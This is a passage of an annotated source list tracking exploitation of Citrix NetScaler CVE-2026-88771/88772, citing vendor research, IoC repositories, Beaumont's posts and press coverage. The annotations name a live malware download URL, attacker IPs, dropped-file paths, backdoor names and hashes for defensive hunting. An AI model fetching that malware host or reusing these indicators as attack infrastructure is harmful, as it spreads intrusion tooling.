51Previdian (@PrevidianCyber) - NetScaler honeypot sensors (Oct 5: installer script dropping the 'host' ELF from f.pylrk.cc to /nsconfig/.nsl and /var/nslog/.nsl during CVE-2026-88771 exploitation attempts; 51.158.203.95 targeting multiple vulnerabilities since 25 Aug; single-source)Technical researchhttps://x.com/PrevidianCyber/status/2107091061579649152
52SOCRadar - "NetScaler C2" framework (Oct 7 per checker v1.15: automated CVE-2026-88771 injection tool, installs a polling agent at /tmp/.nsagent with HTTP and DNS command channels; blog blocks automated fetch, relayed via the Poppelgaard checker) verification pendingTechnical researchhttps://socradar.io/blog/
53Poppelgaard - CVE-2026-88771 through CVE-2026-88778, what you should know and how to fix (Sep 28, last updated Oct 2)Technical researchhttps://www.poppelgaard.com/cve-2026-88771-through-cve-2026-88778-what-you-should-know-and-how-to-fix-your-netscaler-adc-netscaler-gateway
54External malware analysis report (TLP:CLEAR, 2 Oct) - "Sliver C2 Implant Delivered via Citrix NetScaler Exploitation (CVE-2026-88771)"; independent static analysis, corroborated by Expel IR observationTechnical researchhttps://www.virustotal.com/gui/file/0188b0eba4b01c4fb838df9d1d76c76d7f1dc22897e25161975b606c134c1027
55LevelBlue SpiderLabs (THOR team) - CVE-2026-88771 Observed Exploitation Artifacts and Hunt Indicators (Sep 30; own findings, not independently confirmed)Technical researchhttps://www.levelblue.com/blogs/spiderlabs-blog/citrix-netscaler-cve-2026-88771-observed-exploitation-artifacts-and-hunt-indicators
56Beazley Security advisory (updated Sep 29) - IoC table incl. Lupovis honeypot IPsTechnical researchhttps://beazley.security/alerts-advisories/critical-vulnerability-in-citrix-netscaler-zero-day-prompts-emergency-shutdowns-cve-2026-88771-cve-2026-88772
57Corelight - Hunting Citrix NetScaler zero-days (Zeek queries, Sep 28)Technical researchhttps://corelight.com/blog/hunting-citrix-netscaler-zero-days-corelight
58Elastic detection rule - Potential NetScaler Log Poisoning Command Injection Attempt (merged Sep 28)Technical researchhttps://github.com/elastic/detection-rules/blob/main/rules/network/initial_access_netscaler_log_poisoning_command_injection.toml
59SigmaHQ pull request #6352 - NetScaler auth endpoint shell metacharacters (open, Sep 29)Technical researchhttps://github.com/SigmaHQ/sigma/pull/6352
60Nuclei templates pull request #17336 - CVE-2026-88771 active probe (open, Sep 28)Technical researchhttps://github.com/projectdiscovery/nuclei-templates/pull/17336
61eSentire TRU - Update: ongoing exploitation of NetScaler CVE-2026-88771 / -88772 (first-hand IR, Sep 29); "More Shells Than a Seafood Buffet" cluster analysis (blog, Oct 6: four clusters A-D with hashes, timing and tooling)Technical researchhttps://www.esentire.com/security-advisories/update-ongoing-exploitation-of-citrix-netscaler-adc-and-netscaler-gateway-vulnerabilities-cve-2026-88771-cve-2026-88772
62eSentire TRU blog - "More Shells Than a Seafood Buffet: Tracking Citrix NetScaler Exploitation Activities (CVE-2026-88771)" (Oct 6; four clusters: A pre-disclosure nsgtrust.deb webshell, B Platypus via 62.133.62.80 at 3 customers ~24h post-disclosure, C update_c08937.pl via 64.94.85.67 at 4 customers using the watchTowr PoC, D Python reverse shell from 23.27.143.20; notes LLM-style comments in the Perl installer)Technical researchhttps://www.esentire.com/blog/more-shells-than-a-seafood-buffet-tracking-citrix-netscaler-exploitation-activities-cve-2026-88771
63Lumen / Black Lotus Labs - expanded JDY IoT and SOHO botnet research (cited by eSentire for the Platypus/China-nexus association in Cluster B)Technical researchhttps://www.lumen.com/blog/en-us/expanded-jdy-iot-and-soho-botnet-enables-rapid-vulnerability-exploitation
64Beazley Security Labs - BSL-A1216 advisory (first published Sep 26; updates 2-4, Sep 27-29; Update 5 Oct 2; Update 6 Oct 4): consolidated IoCs and hunting commandsTechnical researchhttps://labs.beazley.security/advisories/BSL-A1216
65watchTowr (@watchtowrcyber) - "the watchTowr Labs team has now successfully reproduced this vulnerability" (Oct 3 X post; the vulnerability is not named in the text, understood to be the new SAML issue)Technical researchhttps://x.com/watchtowrcyber/status/2106177591438958751
66watchTowr (@watchtowrcyber) on X, Sep 26 - "Unpatched, 0days. Exploited in-the-wild - discovered during forensics."Technical researchhttps://x.com/watchtowrcyber/status/2103972792043479307
67CyberMaxx - Patches required: Citrix NetScaler vulns exploited in the wild (IoC notes)Technical researchhttps://www.cybermaxx.com/resources/patches-required-citrix-netscaler-vulns-exploited-in-the-wild-cve-2026-88771-and-cve-2026-88772/
68watchTowr - IoC repository for CVE-2026-88771 (GitHub; behavioral indicators, host artifacts, backdoor gw_health account, 47 source IPs, OOB callback domains, Sliver C2 indicators and URI regex, 5 SHA-256 hashes, hunting commands)Telemetry and IoCshttps://github.com/watchtowrlabs/citrix-netscaler-cve-2026-88771-iocs
69GreyNoise - Swarming Against Citrix 0-Day Exploitation (TLP:CLEAR IoCs, Sep 28)Telemetry and IoCshttps://www.greynoise.io/blog/swarming-against-citrix-0-day-exploitation
70GreyNoise Chronicle - GNTL-20260928 CVE-2026-88771 timelineTelemetry and IoCshttps://www.greynoise.io/chronicle/gntl-20260928-citrix-cve-2026-88771
71GreyNoise Visualizer - IP 149.104.78.141Telemetry and IoCshttps://viz.greynoise.io/ips/149.104.78.141
72GreyNoise tag - Citrix NetScaler CVE-2026-88771 Login Command Injection RCE AttemptTelemetry and IoCshttps://viz.greynoise.io/tags/citrix-netscaler-cve-2026-88771-login-command-injection-rce-attempt
73IFIN - Multiple Citrix Netscaler 0-Days Exploited (tracking thread, from Sep 26; observables "shared without restriction")Telemetry and IoCshttps://ifin.network/t/multiple-citrix-netscaler-0-days-exploited/867
74VirusTotal - Perl file b9b0a438... (first submitted Oct 2 17:29 UTC; 3 of 75 engines by late 2 Oct); a Nextron THOR rule for CVE-2026-88771 and a community comment tie it to NetScaler exploitationTelemetry and IoCshttps://www.virustotal.com/gui/file/b9b0a4380db462c706597bd3e6a08d4d99fcbbf0919d63eb99b488d396c8ce63
75VirusTotal - ELF Sliver implant 0188b0eb... (31 of 75 engines; first submitted 2 Oct 11:49 UTC); served from f.pylrk.cc/HaKi2ufpiQ8AeVTZ/host, TLP:CLEAR malware analysis reportTelemetry and IoCshttps://www.virustotal.com/gui/file/0188b0eba4b01c4fb838df9d1d76c76d7f1dc22897e25161975b606c134c1027
76Censys advisory - NetScaler exposure (42,735 hosts, Sep 28); original advisory URL renumbered - now redirects to the CVE-2026-88771/88772 advisory pageTelemetry and IoCshttps://censys.com/advisory/cve-2026-88771-cve-2026-88772/
77Defused (@DefusedCyber) on X, Sep 29 - decoy hits across multiple CVE-2026-88771 pathsTelemetry and IoCshttps://x.com/DefusedCyber/status/2104888497693708505
78Lupovis (@LupovisDefence) on X, Sep 28 - decoys catch CVE-2026-88771 exploitation hours after the PoCTelemetry and IoCshttps://x.com/lupovisdefence/status/2104595071362326680
79Beaumont, Sep 27 - chained CVEs, webshells all September, "Probably nation state aligned"Kevin Beaumonthttps://cyberplace.social/@GossiTheDog/117343729453093307
80Beaumont, Sep 27 - patches live; detection script behind NDA; patching does not remove backdoorsKevin Beaumonthttps://cyberplace.social/@GossiTheDog/117343821114841048
81Beaumont, Sep 27 - Console check misses attempts when logs have rotatedKevin Beaumonthttps://cyberplace.social/@GossiTheDog/117345540231975640
82Beaumont, Sep 28 22:49 UTC - names "PitScaler", >100 victim orgs (his claim)Kevin Beaumonthttps://cyberplace.social/@GossiTheDog/117351107654208046
83Beaumont, Sep 28 23:02 UTC - Citrix checker incomplete (suid /bin/sh)Kevin Beaumonthttps://cyberplace.social/@GossiTheDog/117351155381900219
84Beaumont, Sep 29 04:39 UTC - mass exploitation, <10% patched (his claim)Kevin Beaumonthttps://cyberplace.social/@GossiTheDog/117352481501981552
85Beaumont, Sep 29 06:18 UTC - public message to the NSA (his unverified claim)Kevin Beaumonthttps://cyberplace.social/@GossiTheDog/117352869498139711
86Beaumont, Sep 29 16:12 UTC - IR vendors publishing victim-unique webshell namesKevin Beaumonthttps://cyberplace.social/@GossiTheDog/117355208096613386
87Beaumont, Sep 28 15:13 UTC - GitHub "PoCs" for the new Citrix vulns are "fake AI slop"Kevin Beaumonthttps://cyberplace.social/@GossiTheDog/117349313638958333
88Beaumont, Sep 29 18:32 UTC - Dutch government shuts down all Citrix NetScalers (relaying @bert_hubert)Kevin Beaumonthttps://cyberplace.social/@GossiTheDog/117355758746619146
89Beaumont, Oct 1 00:12 UTC - Arctic Wolf IoCs cover follow-up "spray and pray" activity, not the early-September actorKevin Beaumonthttps://cyberplace.social/@GossiTheDog/117362758120876296
90Beaumont, Oct 2 19:01 UTC - patched 13.1 and 14.1 honeypots are crashing; "we may have #PitScaler 2 on our hands" (with two screenshots of an unattributed write-up)Kevin Beaumonthttps://cyberplace.social/@GossiTheDog/117372857146978531
91Beaumont, Oct 2 20:00 UTC - Citrix has published a blog on the new SAML issue (edited 20:15 UTC: "pitboss will execute" softened to "something will execute")Kevin Beaumonthttps://cyberplace.social/@GossiTheDog/117373090409884785
92Beaumont, Oct 2 19:02 UTC - "to be confirmed but it looks like the pitboss fix is bypassable"Kevin Beaumonthttps://cyberplace.social/@GossiTheDog/117372864244958549
93Beaumont, Oct 2 19:19 UTC - one patched honeypot is running a downloaded binary; "sprayed and prayed"Kevin Beaumonthttps://cyberplace.social/@GossiTheDog/117372929427365765
94Beaumont, Oct 2 23:25 UTC - "the policy citrix gave out doesn't work for me" (reply to O_P about a responder policy from Citrix Support)Kevin Beaumonthttps://cyberplace.social/@GossiTheDog/117373896333693635
95Beaumont, Oct 3 01:40 UTC - "The Citrix support mitigations don't appear to work" (with a screenshot of an r/Citrix thread)Kevin Beaumonthttps://cyberplace.social/@GossiTheDog/117374427108683985
96Security Online (Oct 9) - Citrix NetScaler vulnerability CVE-2026-107406 is critical (quotes Citrix customer guidance: not aware of any unmitigated exploits)Press and vendor coveragehttps://securityonline.info/citrix-netscaler-vulnerability-cve-2026-107406
97Cybersecurity News - "Citrix NetScaler Keeps Rebooting Following the 0-Day Patch" (Guru Baran, Oct 3; page shows only the date; secondary, Reddit-based)Press and vendor coveragehttps://cybersecuritynews.com/citrix-netscaler-0-day-patch/
98BleepingComputer (Sep 29) - Hackers exploit Citrix NetScaler zero-day to deploy web shellsPress and vendor coveragehttps://www.bleepingcomputer.com/news/security/hackers-exploit-citrix-netscaler-zero-day-to-deploy-web-shells/
99BleepingComputer (Sep 27) - Citrix admins warned to shut down NetScalersPress and vendor coveragehttps://www.bleepingcomputer.com/news/security/citrix-admins-warned-to-shut-down-netscalers-over-2-exploited-zero-days/
100The Stack (Oct 1) - Banks, gov'ts, telcos hit by hackers amid escalating NetScaler incidentPress and vendor coveragehttps://www.thestack.technology/banks-govts-telcos-hit-by-hackers-amid-escalating-netscaler-incident-2/
101Help Net Security (Sep 30) - Suspected state-sponsored hackers exploited NetScaler zero-day since early September (CVE-2026-88772)Press and vendor coveragehttps://www.helpnetsecurity.com/2026/09/30/cve-2026-88772-netscaler-exploitation-zero-day/
102Cloudflare changelog (Oct 1) - WAF Release 2026-10-01, Emergency: Citrix NetScaler CVE-2026-88771 managed rulePress and vendor coveragehttps://developers.cloudflare.com/changelog/post/2026-10-01-emergency-waf-release/
103Qualys ThreatPROTECT (Sep 28) - Citrix NetScaler zero-day vulnerabilities exploited in attacksPress and vendor coveragehttps://threatprotect.qualys.com/2026/09/28/citrix-netscaler-adc-and-gateway-zero-day-vulnerabilities-exploited-in-attacks-cve-2026-88771-cve-2026-88772/
104The Hacker News (Oct 1) - Citrix NetScaler post-exploitation payload creates superuser, maps web shell to CSS-like URLs (note: THN has also published unrelated third-party-appliance breach coverage sometimes mislinked to NetScaler)Press and vendor coveragehttps://thehackernews.com/2026/10/citrix-netscaler-post-exploitation.html
105BleepingComputer (Sep 28) - CISA orders feds to patch exploited Citrix flaws by WednesdayPress and vendor coveragehttps://www.bleepingcomputer.com/news/security/cisa-orders-feds-to-patch-exploited-citrix-flaws-by-wednesday/
106SecurityWeek (Sep 28) - Citrix confirms 2 NetScaler zero-daysPress and vendor coveragehttps://www.securityweek.com/citrix-confirms-2-netscaler-zero-days-after-admins-pulled-the-plug/
107The Record (Sep 28) - US, UK warn of Citrix NetScaler zero-day bugPress and vendor coveragehttps://therecord.media/us-uk-warn-of-citrix-netscaler-zero-day-bug
108CyberScoop (Sep 28) - delayed-disclosure anglePress and vendor coveragehttps://cyberscoop.com/citrix-zero-days-delayed-disclosure/
109Sophos CTU (Sep 28) - CVE-2026-88771 / -88772 in active exploitationPress and vendor coveragehttps://www.sophos.com/en-us/blog/citrix-netscaler-cve-2026-88771-cve-2026-88772-in-active-exploitation
110watchTowr FAQ (Sep 27-28)Press and vendor coveragehttps://watchtowr.com/intelligence/citrix-netscaler-zero-day-vulnerabilities-faq/
111The Register (Sep 29) - Custom malware used in Citrix 0-day attacks targeting govt, banks, professional servicesPress and vendor coveragehttps://www.theregister.com/security/2026/09/29/custom-malware-used-in-citrix-0-day-attacks-targeting-govt-banks-professional-services/5299867
112Unit 42 (Palo Alto Networks) - NetScaler zero-days threat brief (Sep 27, updated Sep 28 and Sep 30 with pre- and post-disclosure activity and IoCs)Press and vendor coveragehttps://unit42.paloaltonetworks.com/netscaler-zero-days-exploited/
113Cybersecurity Dive (Sep 28) - Shadowserver: more than 20,000 instances exposedPress and vendor coveragehttps://www.cybersecuritydive.com/news/citrix-upgrades-netscaler-exploitation/831502/
114Help Net Security (Sep 29) - NetScaler zero-day exploitation escalates into mass attacks (Lupovis, Censys)Press and vendor coveragehttps://www.helpnetsecurity.com/2026/09/29/netscaler-zero-day-exploitation-escalates-into-mass-attacks-cve-2026-88771/
115Ingeniøren (Sep 30) - Alvorlige huller i kendt software: PET, Forsvaret og Politiet hastelukker systemerPress and vendor coveragehttps://ing.dk/artikel/alvorlige-huller-i-kendt-software-pet-forsvaret-og-politiet-hastelukker-systemer
116SDxCentral (Sep 29) - NetScaler bugs bring critical sectors down in Europe (citing Techzine)Press and vendor coveragehttps://www.sdxcentral.com/news/netscaler-bugs-bring-critical-sectors-down-in-europe/
117Cybersecurity Dive (Sep 29) - Citrix NetScaler exploitation began days before public notificationPress and vendor coveragehttps://www.cybersecuritydive.com/news/citrix-netscaler-exploitation-days-before-notification/831634/
118heise online (Sep 27) - New zero-day exploits in Citrix NetScalerPress and vendor coveragehttps://www.heise.de/en/news/Security-researchers-warn-New-zero-day-exploits-in-Citrix-Netscaler-11467269.html
119heise online (Oct 3 10:23 CEST) - "Netscaler-Admins aufgepasst: Zero-Day verursacht Crashes und Codeausfuehrung" (Dr. Christopher Kunz; cites Beaumont and a watchTowr reproduction claim, confirmed by watchTowr's own post the same day)Press and vendor coveragehttps://www.heise.de/news/Netscaler-Admins-aufgepasst-Zero-Day-verursacht-Crashes-und-Codeausfuehrung-11474971.html
120Dark Reading (Sep 29) - Dual NetScaler Zero-Days Trigger Chaos for Citrix CustomersPress and vendor coveragehttps://www.darkreading.com/vulnerabilities-threats/netscaler-zero-days-chaos-citrix
121Omroep Brabant (Sep 27) - Storing bij ziekenhuizen door kritieke kwetsbaarheden in systeem (Amphia, ETZ, Z-CERT)Press and vendor coveragehttps://www.omroepbrabant.nl/nieuws/6028828/storing-bij-ziekenhuizen-door-kritieke-kwetsbaarheden-in-systeem
122Citrix community forum - "Update: ... Security Bulletin for CVE-2026-88779" thread (customer comments Oct 4-5 on Console labelling and stat denylist global AAA_REQUEST behaviour; unconfirmed, no Citrix reply)Communityhttps://community.citrix.com/forums/topic/259166-update-citrix-netscaler-adc-and-citrix-netscaler-gateway-security-bulletin-for-cve-2026-88779/
123r/Citrix - "vulnerability scans causing netscaler reboots" thread (early Oct; anonymous comments, unverified)Communityhttps://www.reddit.com/r/Citrix/comments/1wvwuno/vulnerability_scans_causing_netscaler_reboots/
124Maurice_Sec on X - notes from the field on NetScaler Console IoC scanner findingsCommunityhttps://x.com/Maurice_Sec/status/2104541998858240487
125r/Citrix - "Netscaler leak?" thread (~Sep 26)Communityhttps://www.reddit.com/r/Citrix/comments/1wqjk9a/netscaler_leak/
126r/Citrix - comment by asmOne (about 29 Sep; date approximate) quoting log-poison attemptsCommunityhttps://www.reddit.com/r/Citrix/comments/1wqjk9a/comment/pcub9wh/